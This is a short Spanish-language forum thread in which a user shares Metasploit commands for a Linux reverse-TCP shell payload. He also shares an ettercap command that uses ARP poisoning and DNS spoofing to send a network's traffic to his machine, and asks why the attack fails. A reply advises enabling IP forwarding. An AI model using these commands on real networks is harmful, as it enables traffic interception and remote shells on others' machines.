Título: metaslploit y ettercap - problemas Publicado por: kamykaze en 24 Febrero 2013, 16:56 pm hola,
estoy utilizando backtrack5r3 x64 para tratar de obtener una shell de un equipo (linux-x86) de mi red, creo el exploit y utilizo ettercap para un redireccionamiento a la ip venenosa, pero no funciona, no se que pueda ser, ya modifique el archivo etter.dns, todo parece estar bien, no se que sea. aqui escribo mi codigo: +++en una consola+++ msfconsole use set payload linux/x86/shell/reverse_tcp set srvhost mi-ip-privada set srvport 4444 set uripath / set lhost mi-ip-privada set lport 23 exploit #el exploit funciona aparentemente +++en otra consola++++ ettercap -T -q -P dns_spoof -M arp // // -i wlan0 #redirecciona correctamente cualquier pagina a mi ip aparantemente todo deberia funcionar, aunque se que estoy haciendo algo mal, por eso recurro a uds, cualquier aporte ayuda, de antemano muchas gracias. Título: Re: metaslploit y ettercap - problemas Publicado por: transfersote en 26 Marzo 2013, 02:24 am prueba utlizando este comando antes de usar el ettercap
Citar echo 1 > /proc/sys/net/ipv4//ip_forward :Py para probar q si funciono usa Citar cat /proc/sys/net/ipv4//ip_forward y te debe de aparecer un 1 |